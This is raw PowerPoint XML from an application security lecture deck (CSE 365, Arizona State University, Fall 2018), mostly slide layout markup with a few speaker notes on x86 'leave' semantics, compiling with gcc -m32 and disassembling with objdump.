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235"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId2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00" autoAdjust="0"/>
    <p:restoredTop sz="90225" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="166" d="100"/>
          <a:sy n="166" d="100"/>
        </p:scale>
        <p:origin x="192" y="712"/>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viewProps" Target="viewProp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tableStyles" Target="tableStyle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handoutMaster" Target="handoutMasters/handoutMaster1.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notesMaster" Target="notesMasters/notesMaster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11/20/18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11/20/18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3103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1768720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3103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167006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5AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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4866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5AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054722" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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55002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F2EAA3-B90B-3540-B74E-FE7D42A3FF5B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986114" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4573588" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="4113862"/>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1643935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83A21-1A9A-594A-986F-08077ACB5965}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680962" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"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26133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1A4070E-5EB9-564E-AA70-CD0932C2E1FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1364190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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160174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8D1A39-98F2-8A4C-B616-4A88B9D6E6CA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>46</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01673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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="460049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985A03-163E-1E4C-8C68-36E8EC5C6F82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028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09718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baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16139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leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1773622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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1029987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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1071736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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1973468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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1737579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a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5839740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DC0C6E-92FD-E543-A864-B05FD6DAFA38}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="704514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70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981684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baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Set ESP to EBP, then pop EBP.</a:t>
            </a:r>
          </a:p>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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1466014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Segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Fault!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163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159246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0481D4-4C3B-774A-9C43-56765108CB42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030146" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10301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075350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baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="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164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6650532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70919A-7999-1344-A77D-8550F76A0C90}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706562" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706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718936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A5C90E-F172-ED4A-9B27-405EC72B29A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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39325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 assembly syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –Wall –m32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> –D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>leave semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="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170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1722795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121A61-84E2-0240-BA67-5A5A0E89159B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015810" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015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65898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FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017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29887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FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017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58945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135FE7-AEDA-6648-AFAA-5B077E7D38B8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018882" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018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92017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1FD688-6B2C-5049-9211-A6DB3E582AA7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1053698" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10536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2975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148EDD-1C0A-384D-B172-B3B742C536A2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10209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51170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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Table Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6533B83B-44E4-484B-85B6-9FCF77BE0DAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1666500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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="426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426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8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FEE62F38-8D23-B74E-AB9B-1D546E6113A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44565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Adam Doupé, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Assurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2173440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186"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"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 id="2147484559" r:id="rId12"/>
    <p:sldLayoutId id="2147484560"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Application Security</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a:t>CSE 365 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Information Assurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fall 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81389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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
